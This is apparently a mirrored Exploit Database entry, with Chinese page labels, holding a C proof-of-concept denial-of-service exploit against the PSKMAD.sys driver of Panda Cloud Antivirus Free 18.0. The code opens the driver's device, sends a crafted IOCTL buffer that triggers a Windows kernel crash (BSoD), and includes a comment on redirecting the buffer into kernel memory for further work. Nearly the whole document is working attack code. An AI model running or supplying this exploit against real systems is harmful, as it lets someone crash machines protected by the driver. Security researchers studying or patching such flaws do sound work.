Panda Free Antivirus – ‘PSKMAD.sys’ Denial of Service

• Exploit Database
• 15 阅读

• 作者： Peter Baris
  日期： 2017-04-29
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/41945/

• /*
  # Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
  # Date: 2017-04-29
  # Exploit Author: Peter baris
  # Vendor Homepage: http://www.saptech-erp.com.au
  # Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
  # Version: 18.0
  # Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
  # CVE : requested
  */
  
  #include "stdafx.h"
  #include <stdio.h>
  #include <Windows.h>
  #include <winioctl.h>
  
  
  #define DEVICE_NAME L"\\\\.\\PSMEMDriver"
  
  LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
  HANDLE GetDeviceHandle(LPCTSTR FileName) {
  	HANDLE hFile = NULL;
  
  	hFile = CreateFile(FileName,
  		GENERIC_READ | GENERIC_WRITE,
  		0,
  		0,
  		OPEN_EXISTING,
  		NULL,
  		0);
  
  	return hFile;
  }
  
  int main()
  {
  
  	HANDLE hFile = NULL;
  	PVOID64 lpInBuffer = NULL;
  	ULONG64 lpBytesReturned;
  	PVOID64 BuffAddress = NULL;
  	SIZE_T BufferSize = 0x800;
  	
  	printf("Trying the get the handle for the PSMEMDriver device.\r\n");
  	
  	hFile = GetDeviceHandle(FileName);
  
  	if (hFile == INVALID_HANDLE_VALUE) {
  		printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
  		return 1;
  	}
  
  	// Allocate memory for our buffer
  	lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  	
  
  	if (lpInBuffer == NULL) {
  		printf("VirtualAlloc() failed. \r\n");
  		return 1;
  	}
  	
  
  	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
  	*(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
  	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
  	*(PULONG64)BuffAddress = (ULONG64)0x42424242;
  	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
  	
  	RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);
  
  
  
  		DeviceIoControl(hFile,
  			0xb3702c38,
  			lpInBuffer,
  			NULL,//Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
  			NULL,
  			NULL,
  			&lpBytesReturned,
  			NULL);
  
  	/*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
  	printf("Cleaning up.\r\n");
  	VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
  	CloseHandle(hFile);
  	printf("Resources freed up.\r\n");
  return 0;
  }